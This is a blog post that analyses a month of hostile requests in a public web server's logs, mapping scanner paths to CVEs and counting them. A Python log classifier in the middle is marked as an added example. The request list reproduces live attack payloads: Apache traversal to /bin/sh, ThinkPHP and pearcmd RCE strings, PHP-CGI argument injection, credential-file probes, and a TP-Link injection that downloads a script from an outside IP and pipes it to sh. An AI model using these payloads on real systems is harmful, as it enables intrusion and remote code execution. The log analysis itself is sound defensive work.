Web server log analysis: November 2024

2024-12-24 Technical

This is an analysis of traffic that was not ordinary access, taken from the logs of a web server I run publicly.

Most frequent requests

Remote execution of eval via PHPUnit

Requests attempting to execute eval() by exploiting a vulnerability in PHPUnit, the PHP unit-testing tool.

JVNDB-2017-005280 - JVN iPedia - Vulnerability Countermeasure Information Database

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/phpunit/Util/PHP/eval-stdin.php
/phpunit/src/Util/PHP/eval-stdin.php
/phpunit/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/src/Util/PHP/eval-stdin.php
/lib/phpunit/Util/PHP/eval-stdin.php
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Access to login pages

I could not identify which service was being targeted, but there was access to login pages that appears to be for brute-force purposes.

/admin/assets/js/views/login.js
/html/admin/assets/js/views/login.js

Shell execution via the Apache path traversal vulnerabilities (CVE-2021-41773, CVE-2021-42013)

There were attacks that simply attempted path traversal.

Apache HTTP Server directory traversal vulnerability CVE-2021-41773 verification #Apache_http_server - Qiita

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

Attacks targeting the TP-Link Archer AX21 router vulnerability (CVE-2023-1389)

June 2023 MBSD-SOC detection trend topics | Engineer blog | Mitsui Bussan Secure Directions, Inc.

/cgi-bin/luci/;stok=/locale

GeoServer vulnerability

Critical GeoServer vulnerability CVE-2023-35042 fixed: RCE attacks being observed – IoT OT Security News

/geoserver/web/

Spring Framework vulnerability

This appears to be traffic related to a vulnerability in Spring Cloud Gateway, a feature of the Spring Framework.
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability

/actuator/gateway/routes
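As an added example (not part of the original post), the following Python script classifies Apache combined-format access log lines against the scan patterns described above and counts hits per pattern. The signature labels and the sample log lines are my own construction; percent-decoding twice is what makes the %%32%65 form and the .%2e form of the traversal land in the same bucket.

```python
import re
from collections import Counter
from urllib.parse import unquote
# Labels are my own names for the scan patterns described in the sections above.
SIGNATURES = [
    ("phpunit-eval-stdin", re.compile(r"/eval-stdin\.php$")),
    ("apache-cve-2021-41773", re.compile(r"^/cgi-bin/(\.\./)+")),  # after decoding
    ("tplink-cve-2023-1389", re.compile(r"^/cgi-bin/luci/;stok=")),
    ("geoserver", re.compile(r"^/geoserver/")),
    ("spring-cloud-gateway", re.compile(r"^/actuator/gateway/")),
    ("dotenv-probe", re.compile(r"/\.env(\.|~|$)")),
]
# Apache combined log format: client ident user [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

def normalize(uri):
    # Drop the query string and percent-decode twice: %%32%65 -> %2e -> '.'
    return unquote(unquote(uri.split("?", 1)[0]))

def classify(uri):
    # Signature name for one request URI, or None if it matches nothing.
    path = normalize(uri)
    for name, pattern in SIGNATURES:
        if pattern.search(path):
            return name
    return None

def summarize(lines):
    # Count matching requests per signature over raw access-log lines.
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:  # not combined log format (e.g. binary junk request lines)
            continue
        label = classify(m.group("uri"))
        if label is not None:
            counts[label] += 1
    return counts

# Constructed sample lines, not the post's real log; IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Nov/2024:03:12:45 +0900] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Nov/2024:04:01:02 +0900] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 196 "-" "curl/7.88.1"
198.51.100.7 - - [05/Nov/2024:04:01:03 +0900] "GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 196 "-" "curl/7.88.1"
192.0.2.33 - - [06/Nov/2024:11:20:00 +0900] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 196 "-" "-"
192.0.2.33 - - [06/Nov/2024:11:20:01 +0900] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "-"
192.0.2.33 - - [06/Nov/2024:11:20:03 +0900] "GET /api/.env.bak HTTP/1.1" 404 196 "-" "-"
192.0.2.44 - - [06/Nov/2024:12:00:00 +0900] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
```

Running `summarize(SAMPLE_LOG.splitlines())` over the constructed sample gives two hits for the Apache traversal (one per encoding) and one each for the other patterns; the normal /index.html request is left uncounted.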

List of suspicious requests

uri count
/robots.txt 1679
/.env 882
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 389
/favicon.ico 341
/sw.js 327
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 303
/admin/assets/js/views/login.js 285
/ads.txt 209
/.git/config 180
/admin/config.php 169
/cgi-bin/luci/;stok=/locale 150
* 143
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0 139
/wp-login.php 131
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh 125
mstshash=Administr 123
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 110
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php 103
/vendor/phpunit/Util/PHP/eval-stdin.php 103
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 103
/vendor/phpunit/src/Util/PHP/eval-stdin.php 102
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php 102
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/phpunit/phpunit/Util/PHP/eval-stdin.php 101
/phpunit/src/Util/PHP/eval-stdin.php 100
/phpunit/Util/PHP/eval-stdin.php 100
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php 99
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php 99
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/lib/phpunit/src/Util/PHP/eval-stdin.php 98
/lib/phpunit/Util/PHP/eval-stdin.php 98
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 98
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello 97
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello 97
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php 97
/index.php?lang=../../../../../../../../tmp/index1 97
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/containers/json 97
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 97
/app-ads.txt 81
/vendor/phpunit/phpunit/src/Util/PHP/evil.php 80
/app/vendor/phpunit/phpunit/src/Util/PHP/evil.php 80
/index.xml 78
/login.asp 76
/login.rsp 73
/.well-known/traffic-advice 71
/wp 68
/wordpress 68
/old 68
/new 68
/main 68
/home 68
/bk 68
/bc 68
/backup 68
/wp-content/ 66
/boaform/admin/formLogin 66
/sellers.json 65
//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js 63
/.env.bak 61
/webui/ 59
/manifest.js 59
/.env.example 58
/geoserver/web/ 56
/actuator/gateway/routes 56
/_profiler/phpinfo 51
/config.json 47
/html/admin/assets/js/views/login.js 43
/t4 42
/phpinfo.php 42
/tags/go 41
/api/.env 40
/cgi-bin/index.html 39
/cgi-bin/index.cgi 39
/apply.cgi 39
/tags/python 37
/login 37
/.aws/credentials 36
/index.php 35
/info.php 33
/.env.dev 33
/.env.production 32
/password/reset 30
/.env.save 30
/.env.local 30
/wp-includes/class-index-wordpress.php 27
/pinfo.php 27
/admin/.env 27
/.env.prod 27
/core/.env 25
/aws.yml 25
/archives/2019 25
/app/.env 25
/.aws/credentials/phpinfo 25
/about 24
/owa/ 23
/crm/.env 23
/backend/.env 23
/apps/.env 23
/webui 22
/vendor/.env 22
/user 22
/new/.env 22
/library/.env 22
/human.aspx 22
/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage 22
/admin/modules/framework/amp_conf/htdocs/admin/config.php 22
/.env.backup 22
/public/.env 21
/app/config/.env 21
/admin.php 21
/.well-known/security.txt 21
/config/.env 20
/actuator/health 20
/.env_sample 20
/www/.git/config 19
/wp-admin/.env 19
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 19
/audio/.env 19
/aab9 19
/HNAP1 19
/.json 19
/.env.live 19
/sdk 18
/php_info.php 18
/old_phpinfo.php 18
/media../.git/config 18
/dev/.git/config 18
/dashboard/phpinfo.php 18
/api/.git/config 18
/1.php 18
//.env 18
/.env.stage 18
/.env.old 18
/static../.git/config 17
/php-info.php 17
/linusadmin-phpinfo.php 17
/dns-query 17
/data/.git/config 17
/base/.env 17
/assets../.git/config 17
/_profiler/phpinfo.php 17
/.gitlab-ci.yml 17
/+CSCOE+/logon.html 17
/v2/_catalog 16
/public/.git/config 16
/media/.git/config 16
/download/.env 16
/docs/.env 16
/config/aws.yml 16
/aaa9 16
/.envrc 16
/web/.env 15
/teorema505?t=1 15
/src/.git/config 15
/site/.env 15
/shared/.env 15
/lib/.env 15
/js/.git/config 15
/docker-compose.prod.yml 15
/default.php 15
/debug/default/view?panel=config 15
/database/.env 15
/config/environment.rb 15
/config.yml 15
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45.202.35.24%2Fl+-O-%7C+sh%60) 15
/alive.php 15
/ab2h 15
/ab2g 15
/aab8 15
/.vscode/sftp.json 15
/.travis.yml 15
/.env.prod.local 15
web.realsysadm.in:443 14
example.com:80 14
/wp-content/.env 14
/version 14
/server/.git/config 14
/laravel/.env 14
/conf/.env 14
/.git/HEAD 14
7 13
/www/.env 13
/src/.env 13
/sites/all/libraries/mailchimp/.env 13
/protected/.env 13
/old/.env 13
/menu.php 13
/local/.env 13
/demo/.env 13
/cgi-bin/.env 13
/bootstrap.yml 13
/blog/.env 13
/autodiscover/autodiscover.json?@zdi/Powershell 13
//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js 13
//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js 13
//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js 13
/.env.production.local 13
/.env.dev.local 13
/xx.php 12
/ws.php 12
/wp-content/themes/seotheme/mar.php 12
/upload.php 12
/upl.php 12
/systembc/password.php 12
/shell.php 12
/password.php 12
/geoip/ 12
/form.html 12
/dana-na/nc/nc_gina_ver.txt 12
/dana-cached/hc/HostCheckerInstaller.osx 12
/cgi-bin/info.cgi 12
/base.php 12
/.well-known/assetlinks.json 12
/.well-known/apple-app-site-association 12
/.env~ 12
/.env.testing 12
